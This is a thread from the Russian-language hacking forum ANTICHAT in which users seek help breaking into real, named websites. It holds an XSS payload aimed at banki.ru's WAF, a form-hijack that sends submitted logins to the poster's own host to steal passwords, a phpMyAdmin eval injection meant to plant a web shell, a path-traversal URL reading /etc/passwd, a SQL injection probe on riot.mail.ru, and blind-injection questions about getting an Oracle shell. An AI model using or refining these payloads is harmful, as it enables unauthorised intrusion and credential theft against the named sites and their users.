ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

17.08.2015, 10:44
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от ocheretko
ocheretko said:
↑
Может быть у кого-то получится обойти WAF
Код:
Code:
https://www.banki.ru/news/bankimail/subscribe/?a=0&email=" type=text autofocus onfocus=alert() id=">
ocheretko,Сервер банит IP. О таком надо предупреждать.
|
|
|

18.08.2015, 15:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 8965
Репутация:
0
|
|
можно вопрос нашел уязвимый сайт , там blind sql injection
он медленно подбирает таблицы видимо вслепую) поставил для перебора количество потоков равным 10
current user is dba :true (база оракле)
пытаюсь запустать скл шелл пишет operation system shell functionality not yet implemented for oracle)
чтото можно сделать?) ато там баз много и юзеров баз много до пенсии будет перебирать )
|
|
|
|

18.08.2015, 17:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 13708
Репутация:
0
|
|
Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?
Вот мой base.php
Код:
Code:
Вот сам submit
И так обращяюсь к submit.
document.getElementById('lsform').action="http://мойхост.ru/base.php?";
|
|
|
|

18.08.2015, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 17650
Репутация:
0
|
|
Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9
server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461 a58c9&cmd=phpinfo();
Сплоит не работает , ответ
SQL-запрос:
SELECT `information_schema`.`SCHEMATA` . *
FROM `information_schema`.`SCHEMATA`
GROUP BY BINARY `information_schema`.`SCHEMATA`.`SCHEMA_NAME`
ORDER BY BINARY `"]) OR eval($_REQUEST[cmd]); //` DESC
Ответ MySQL:
#1054 - Unknown column '"]) OR eval($_REQUEST[cmd]); //' in 'order clause'
как раскрутить помогите и сильно не ругайте я только начинаю.
|
|
|
|

19.08.2015, 12:17
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от nik1201
nik1201 said:
↑
Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?
Вот мой base.php
Как выглядит XSS и где она?
Сообщение от zifus
zifus said:
↑
Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9
Сплоит не работает , ответ
Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.
|
|
|

19.08.2015, 13:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 17650
Репутация:
0
|
|
Сообщение от XAMEHA
XAMEHA said:
↑
Как выглядит XSS и где она?
Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.
Мне нужно залить шелл на сайт.. В PMA Нет привилегий..
|
|
|
|

19.08.2015, 18:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 15245
Репутация:
11
|
|
Код:
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd
Подскажите как можно обойти.
|
|
|
|

19.08.2015, 23:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 45774
Репутация:
26
|
|
Сообщение от 3nvY
3nvY said:
↑
Код:
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd
Подскажите как можно обойти.
Код:
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php
404 как бэ, да и плюс http://bit.ly/1J4XXyF уже сломали переломали
|
|
|
|

20.08.2015, 01:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 1367
Репутация:
0
|
|
Что то есть?
Код:
Code:
http://riot.mail.ru/info/news/index.php?show=dat&date=12082015'
|
|
|
|

21.08.2015, 12:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 17650
Репутация:
0
|
|
Что можно с этого поиметь...
- exception 'Exception' with message 'Disabled' in /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_theme.php:1019 Stack trace: #0 [internal function]: template_preprocess_theme_wallet_info(Array, 'theme_wallet_in...') #1 /var/www/vhosts//includes/theme.inc(710): call_user_func_array('template_prepro...', Array) #2 /tmp/tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u5 4jkaA.php(25): theme('theme_wallet_in...') #3 /var/www/vhosts//themes/engines/phptal/PHPTAL.php(675): tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u5 4jkaA(Object(PHPTAL), Object(PHPTAL_Context)) #4 /var/www/vhosts//themes/engines/phptal/phptal.engine(86): PHPTAL->execute() #5 /var/www/vhosts//includes/theme.inc(738): phptal_render_template('sites/all/modul...', Array) #6 /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_room.php(1273): theme('apparat_select') #7 /var/www/vhosts//sites/all/modules/custom/casino/casino.module(318): ctrl_room->http_apparat(Array) #8 [internal function]: casino_menu_callback('room', 'apparat') #9 /var/www/vhosts//includes/menu.inc(350): call_user_func_array('casino_menu_cal...', Array) #10 /var/www/vhosts//index.php(53): menu_execute_active_handler() #11 {main}
- There is a problem with the phptal theme engine Please refer to the documentation on the PHPTAL project page.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|